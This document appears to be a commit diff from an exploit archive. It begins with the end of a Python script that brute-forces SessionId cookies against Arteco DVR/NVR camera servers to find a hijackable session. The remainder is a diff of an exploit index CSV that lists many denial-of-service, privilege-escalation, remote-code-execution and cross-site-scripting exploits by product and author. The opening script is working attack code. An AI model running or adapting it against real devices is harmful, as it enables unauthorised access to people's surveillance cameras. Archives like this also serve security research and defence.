# Check the Set-Cookie on the target and determine the length (varies per model/version)
# Cookie: SessionId=15800 - range(10000,100000)
# Cookie: SessionId=8350 - range(1000,10000)
# Cookie: SessionId=502 - range(100,1000)
self.op = range(17129,17149) # Tweak
for j in self.op:
session=requests.session()
self.cookies=dict(SessionId=str(j))
sys.stdout.write('[+] Trying ID: '+str(j))
self.path='/arteco-mobile/'
self.cgi='camera.fcgi'
self.params='?serverId=1&camera=2&mode=1&szx=5&szy=5&qty=15&fps=1'
self.validate=session.get(self.ip+self.path+self.cgi+self.params, cookies=self.cookies).headers
if not 'artecomobile' in str(self.validate):
print(' - NOPE.')
else:
print(' - BINGO!!!')
print('[+] Active session found: '+str(j))
print('[+] Use the cookie: SessionId='+str(j))
exit(9)
print('[!] Sorry, no valid session found.')
def main(self):
self.bro()
self.force()
if __name__ == '__main__':
BrutusCookius().main()

1213
exploits/windows_x86-64/local/49863.js
View file

File diff suppressed because it is too large Load diff

76
files_exploits.csv
View file

@ -5252,7 +5252,6 @@ id,file,description,date,author,type,platform,port
40524,exploits/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",1970-01-01,"Antonio Z.",dos,osx, 40524,exploits/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",1970-01-01,"Antonio Z.",dos,osx,
40536,exploits/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",1970-01-01,"sultan albalawi",dos,windows, 40536,exploits/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",1970-01-01,"sultan albalawi",dos,windows,
43596,exploits/windows/dos/43596.py,"OBS Studio 20.1.3 - Local Buffer Overflow",1970-01-01,ScrR1pTK1dd13,dos,windows, 43596,exploits/windows/dos/43596.py,"OBS Studio 20.1.3 - Local Buffer Overflow",1970-01-01,ScrR1pTK1dd13,dos,windows,
50311,exploits/windows/dos/50311.py,"Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial-Of-Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
43710,exploits/windows/dos/43710.js,"Microsoft Edge Chakra JIT - Incorrect Bounds Calculation",1970-01-01,"Google Security Research",dos,windows, 43710,exploits/windows/dos/43710.js,"Microsoft Edge Chakra JIT - Incorrect Bounds Calculation",1970-01-01,"Google Security Research",dos,windows,
43713,exploits/windows/dos/43713.js,"Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type Confusion",1970-01-01,"Google Security Research",dos,windows, 43713,exploits/windows/dos/43713.js,"Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type Confusion",1970-01-01,"Google Security Research",dos,windows,
43715,exploits/windows/dos/43715.js,"Microsoft Edge Chakra - Incorrect Scope Handling",1970-01-01,"Google Security Research",dos,windows, 43715,exploits/windows/dos/43715.js,"Microsoft Edge Chakra - Incorrect Scope Handling",1970-01-01,"Google Security Research",dos,windows,
@ -6757,7 +6756,6 @@ id,file,description,date,author,type,platform,port
48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",1970-01-01,"Saeed reza Zamanian",dos,windows, 48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",1970-01-01,"Saeed reza Zamanian",dos,windows,
48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",1970-01-01,mostwanted002,dos,linux, 48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",1970-01-01,mostwanted002,dos,linux,
49589,exploits/windows/dos/49589.py,"SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)",1970-01-01,"Sinem Şahin",dos,windows, 49589,exploits/windows/dos/49589.py,"SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)",1970-01-01,"Sinem Şahin",dos,windows,
49590,exploits/windows/dos/49590.py,"Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)",1970-01-01,"Sinem Şahin",dos,windows,
48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",1970-01-01,"Felipe Winsnes",dos,windows, 48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",1970-01-01,"Felipe Winsnes",dos,windows,
48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,windows, 48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,windows,
48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,windows, 48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,windows,
@ -6770,17 +6768,9 @@ id,file,description,date,author,type,platform,port
49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows, 49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",1970-01-01,"Guillaume PETIT",dos,multiple, 49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",1970-01-01,"Guillaume PETIT",dos,multiple,
49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",1970-01-01,stresser,dos,windows, 49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",1970-01-01,stresser,dos,windows,
49489,exploits/multiple/dos/49489.html,"jQuery UI 1.12.1 - Denial of Service (DoS)",1970-01-01,"Rafael Cintra Lopes",dos,multiple,
49566,exploits/windows/dos/49566.txt,"Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows, 49566,exploits/windows/dos/49566.txt,"Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49567,exploits/windows/dos/49567.txt,"AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49568,exploits/windows/dos/49568.txt,"Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49638,exploits/windows/dos/49638.py,"Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)",1970-01-01,"Enes Özeser",dos,windows, 49638,exploits/windows/dos/49638.py,"Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)",1970-01-01,"Enes Özeser",dos,windows,
49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",1970-01-01,LiquidWorm,dos,hardware,
49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple,
49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",1970-01-01,Enesdex,dos,hardware, 49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",1970-01-01,Enesdex,dos,hardware,
49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple,
49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",1970-01-01,"Dolev Farhi",dos,multiple,
49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",1970-01-01,"Dolev Farhi",dos,php,
49844,exploits/windows/dos/49844.py,"Sandboxie 5.49.7 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows, 49844,exploits/windows/dos/49844.py,"Sandboxie 5.49.7 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows,
49883,exploits/ios/dos/49883.py,"WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,ios, 49883,exploits/ios/dos/49883.py,"WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,ios,
49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows, 49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
@ -6798,9 +6788,6 @@ id,file,description,date,author,type,platform,port
50002,exploits/ios/dos/50002.py,"Post-it 5.0.1 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, 50002,exploits/ios/dos/50002.py,"Post-it 5.0.1 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, 50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",1970-01-01,stresser,dos,windows, 50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",1970-01-01,stresser,dos,windows,
50247,exploits/windows/dos/50247.py,"Telegram Desktop 2.9.2 - Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",dos,windows,
50266,exploits/windows/dos/50266.py,"SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service",1970-01-01,"Eric Salario",dos,windows,
50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial-Of-Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
@ -11314,9 +11301,6 @@ id,file,description,date,author,type,platform,port
49646,exploits/windows/local/49646.txt,"Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows, 49646,exploits/windows/local/49646.txt,"Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
49647,exploits/windows/local/49647.txt,"eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows, 49647,exploits/windows/local/49647.txt,"eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
49648,exploits/windows/local/49648.txt,"Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows, 49648,exploits/windows/local/49648.txt,"Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
49653,exploits/windows/local/49653.py,"GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC)",1970-01-01,"Brian Rodriguez",local,windows,
49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",1970-01-01,"Brian Rodriguez",local,windows,
49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC)",1970-01-01,"Brian Rodriguez",local,windows,
49660,exploits/windows/local/49660.py,"FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)",1970-01-01,"Paolo Stagno",local,windows, 49660,exploits/windows/local/49660.py,"FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)",1970-01-01,"Paolo Stagno",local,windows,
49661,exploits/windows/local/49661.txt,"VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path",1970-01-01,"Mohammed Alshehri",local,windows, 49661,exploits/windows/local/49661.txt,"VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path",1970-01-01,"Mohammed Alshehri",local,windows,
49671,exploits/windows/local/49671.txt,"BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path",1970-01-01,"Metin Yunus Kandemir",local,windows, 49671,exploits/windows/local/49671.txt,"BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path",1970-01-01,"Metin Yunus Kandemir",local,windows,
@ -11344,7 +11328,6 @@ id,file,description,date,author,type,platform,port
49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows, 49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows, 49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",1970-01-01,1F98D,local,windows, 49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",1970-01-01,1F98D,local,windows,
49863,exploits/windows_x86-64/local/49863.js,"Microsoft Internet Explorer 8/11 and WPAD service 'Jscript.dll' - Use-After-Free",1970-01-01,"Forrest Orr",local,windows_x86-64,
49864,exploits/windows_x86-64/local/49864.js,"Firefox 72 IonMonkey - JIT Type Confusion",1970-01-01,"Forrest Orr",local,windows_x86-64, 49864,exploits/windows_x86-64/local/49864.js,"Firefox 72 IonMonkey - JIT Type Confusion",1970-01-01,"Forrest Orr",local,windows_x86-64,
49872,exploits/windows/local/49872.js,"Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free",1970-01-01,SlidingWindow,local,windows, 49872,exploits/windows/local/49872.js,"Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free",1970-01-01,SlidingWindow,local,windows,
49882,exploits/windows/local/49882.ps1,"Visual Studio Code 1.47.1 - Denial of Service (PoC)",1970-01-01,"H.H.A.Ravindu Priyankara",local,windows, 49882,exploits/windows/local/49882.ps1,"Visual Studio Code 1.47.1 - Denial of Service (PoC)",1970-01-01,"H.H.A.Ravindu Priyankara",local,windows,
@ -11385,7 +11368,6 @@ id,file,description,date,author,type,platform,port
50184,exploits/windows/local/50184.txt,"Amica Prodigy 1.7 - Privilege Escalation",1970-01-01,"Andrea Intilangelo",local,windows, 50184,exploits/windows/local/50184.txt,"Amica Prodigy 1.7 - Privilege Escalation",1970-01-01,"Andrea Intilangelo",local,windows,
50188,exploits/android/local/50188.txt,"Xiaomi browser 10.2.4.g - Browser Search History Disclosure",1970-01-01,"Vishwaraj Bhattrai",local,android, 50188,exploits/android/local/50188.txt,"Xiaomi browser 10.2.4.g - Browser Search History Disclosure",1970-01-01,"Vishwaraj Bhattrai",local,android,
50212,exploits/windows/local/50212.txt,"SonicWall NetExtender 10.2.0.300 - Unquoted Service Path",1970-01-01,shinnai,local,windows, 50212,exploits/windows/local/50212.txt,"SonicWall NetExtender 10.2.0.300 - Unquoted Service Path",1970-01-01,shinnai,local,windows,
50236,exploits/linux/local/50236.py,"MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)",1970-01-01,ninpwn,local,linux,
50258,exploits/windows/local/50258.txt,"Remote Mouse 4.002 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, 50258,exploits/windows/local/50258.txt,"Remote Mouse 4.002 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, 50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, 50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
@ -11393,10 +11375,8 @@ id,file,description,date,author,type,platform,port
50289,exploits/python/local/50289.py,"Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai",1970-01-01,"Abhiram V",local,python, 50289,exploits/python/local/50289.py,"Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai",1970-01-01,"Abhiram V",local,python,
50331,exploits/windows/local/50331.txt,"Microsoft Windows cmd.exe - Stack Buffer Overflow",1970-01-01,hyp3rlinx,local,windows, 50331,exploits/windows/local/50331.txt,"Microsoft Windows cmd.exe - Stack Buffer Overflow",1970-01-01,hyp3rlinx,local,windows,
50332,exploits/windows/local/50332.py,"Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows, 50332,exploits/windows/local/50332.py,"Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial-of-Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows, 50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux, 50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
50401,exploits/windows/local/50401.txt,"Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18518,15 +18498,11 @@ id,file,description,date,author,type,platform,port
49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",1970-01-01,"Christopher Ellis",remote,java, 49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",1970-01-01,"Christopher Ellis",remote,java,
49629,exploits/windows/remote/49629.py,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)",1970-01-01,1F98D,remote,windows, 49629,exploits/windows/remote/49629.py,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)",1970-01-01,1F98D,remote,windows,
49663,exploits/windows/remote/49663.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)",1970-01-01,F5,remote,windows, 49663,exploits/windows/remote/49663.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)",1970-01-01,F5,remote,windows,
49682,exploits/hardware/remote/49682.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access",1970-01-01,LiquidWorm,remote,hardware,
49695,exploits/hardware/remote/49695.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm",1970-01-01,LiquidWorm,remote,hardware,
49719,exploits/multiple/remote/49719.py,"vsftpd 3.0.3 - Remote Denial of Service",1970-01-01,xynmaps,remote,multiple,
49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",1970-01-01,r4j0x00,remote,multiple, 49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",1970-01-01,r4j0x00,remote,multiple,
49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",1970-01-01,r4j0x00,remote,multiple, 49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",1970-01-01,r4j0x00,remote,multiple,
49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",1970-01-01,"Google Security Research",remote,linux, 49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",1970-01-01,"Google Security Research",remote,linux,
49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",1970-01-01,HerculesRD,remote,unix, 49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",1970-01-01,HerculesRD,remote,unix,
49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",1970-01-01,BenChaliah,remote,hardware, 49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",1970-01-01,BenChaliah,remote,hardware,
49815,exploits/linux/remote/49815.py,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)",1970-01-01,liewehacksie,remote,linux,
49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",1970-01-01,legend,remote,solaris, 49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",1970-01-01,legend,remote,solaris,
49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",1970-01-01,Shellbr3ak,remote,linux, 49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",1970-01-01,Shellbr3ak,remote,linux,
49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",1970-01-01,sirpedrotavares,remote,hardware, 49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",1970-01-01,sirpedrotavares,remote,hardware,
@ -43344,7 +43320,6 @@ id,file,description,date,author,type,platform,port
48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",1970-01-01,"Dylan Garnaud",webapps,java, 48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",1970-01-01,"Dylan Garnaud",webapps,java,
48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",1970-01-01,Besim,webapps,php, 48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",1970-01-01,Besim,webapps,php,
48462,exploits/java/webapps/48462.py,"TylerTech Eagle 2018.3.11 - Remote Code Execution",1970-01-01,"Anthony Cole",webapps,java, 48462,exploits/java/webapps/48462.py,"TylerTech Eagle 2018.3.11 - Remote Code Execution",1970-01-01,"Anthony Cole",webapps,java,
49574,exploits/php/webapps/49574.txt,"PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting",1970-01-01,"Anmol K Sachan",webapps,php,
49575,exploits/php/webapps/49575.txt,"Comment System 1.0 - 'multiple' Stored Cross-Site Scripting",1970-01-01,"Pintu Solanki",webapps,php, 49575,exploits/php/webapps/49575.txt,"Comment System 1.0 - 'multiple' Stored Cross-Site Scripting",1970-01-01,"Pintu Solanki",webapps,php,
49576,exploits/php/webapps/49576.txt,"Online Exam System With Timer 1.0 - 'email' SQL injection Auth Bypass",1970-01-01,"Suresh Kumar",webapps,php, 49576,exploits/php/webapps/49576.txt,"Online Exam System With Timer 1.0 - 'email' SQL injection Auth Bypass",1970-01-01,"Suresh Kumar",webapps,php,
49578,exploits/multiple/webapps/49578.txt,"OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting",1970-01-01,"Kamil Breński",webapps,multiple, 49578,exploits/multiple/webapps/49578.txt,"OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting",1970-01-01,"Kamil Breński",webapps,multiple,
@ -43784,7 +43759,6 @@ id,file,description,date,author,type,platform,port
49345,exploits/php/webapps/49345.txt,"CMS Made Simple 2.2.15 - RCE (Authenticated)",1970-01-01,"Andrey Stoykov",webapps,php, 49345,exploits/php/webapps/49345.txt,"CMS Made Simple 2.2.15 - RCE (Authenticated)",1970-01-01,"Andrey Stoykov",webapps,php,
49346,exploits/php/webapps/49346.txt,"Subrion CMS 4.2.1 - 'avatar[path]' XSS",1970-01-01,icekam,webapps,php, 49346,exploits/php/webapps/49346.txt,"Subrion CMS 4.2.1 - 'avatar[path]' XSS",1970-01-01,icekam,webapps,php,
49347,exploits/multiple/webapps/49347.txt,"Click2Magic 1.1.5 - Stored Cross-Site Scripting",1970-01-01,"Shivam Verma",webapps,multiple, 49347,exploits/multiple/webapps/49347.txt,"Click2Magic 1.1.5 - Stored Cross-Site Scripting",1970-01-01,"Shivam Verma",webapps,multiple,
49348,exploits/windows/webapps/49348.py,"Arteco Web Client DVR/NVR - 'SessionId' Brute Force",1970-01-01,LiquidWorm,webapps,windows,
49351,exploits/multiple/webapps/49351.html,"IncomCMS 2.0 - Insecure File Upload",1970-01-01,MoeAlBarbari,webapps,multiple, 49351,exploits/multiple/webapps/49351.html,"IncomCMS 2.0 - Insecure File Upload",1970-01-01,MoeAlBarbari,webapps,multiple,
49352,exploits/php/webapps/49352.txt,"House Rental and Property Listing 1.0 - Multiple Stored XSS",1970-01-01,"Mohamed habib Smidi",webapps,php, 49352,exploits/php/webapps/49352.txt,"House Rental and Property Listing 1.0 - Multiple Stored XSS",1970-01-01,"Mohamed habib Smidi",webapps,php,
49353,exploits/php/webapps/49353.txt,"Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection)",1970-01-01,"Kshitiz Raj",webapps,php, 49353,exploits/php/webapps/49353.txt,"Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection)",1970-01-01,"Kshitiz Raj",webapps,php,
@ -43810,7 +43784,6 @@ id,file,description,date,author,type,platform,port
49377,exploits/php/webapps/49377.txt,"WordPress Plugin WP24 Domain Check 1.6.2 - 'fieldnameDomain' Stored Cross Site Scripting",1970-01-01,"Mehmet Kelepçe",webapps,php, 49377,exploits/php/webapps/49377.txt,"WordPress Plugin WP24 Domain Check 1.6.2 - 'fieldnameDomain' Stored Cross Site Scripting",1970-01-01,"Mehmet Kelepçe",webapps,php,
49378,exploits/multiple/webapps/49378.txt,"Newgen Correspondence Management System (corms) eGov 12.0 - IDOR",1970-01-01,"ALI AL SINAN",webapps,multiple, 49378,exploits/multiple/webapps/49378.txt,"Newgen Correspondence Management System (corms) eGov 12.0 - IDOR",1970-01-01,"ALI AL SINAN",webapps,multiple,
49380,exploits/php/webapps/49380.txt,"Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated)",1970-01-01,"Arnav Tripathy",webapps,php, 49380,exploits/php/webapps/49380.txt,"Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated)",1970-01-01,"Arnav Tripathy",webapps,php,
49381,exploits/php/webapps/49381.txt,"Resumes Management and Job Application Website 1.0 - Multiple Stored XSS",1970-01-01,"Arnav Tripathy",webapps,php,
49383,exploits/multiple/webapps/49383.py,"Gitea 1.7.5 - Remote Code Execution",1970-01-01,1F98D,webapps,multiple, 49383,exploits/multiple/webapps/49383.py,"Gitea 1.7.5 - Remote Code Execution",1970-01-01,1F98D,webapps,multiple,
49385,exploits/java/webapps/49385.py,"Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)",1970-01-01,1F98D,webapps,java, 49385,exploits/java/webapps/49385.py,"Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)",1970-01-01,1F98D,webapps,java,
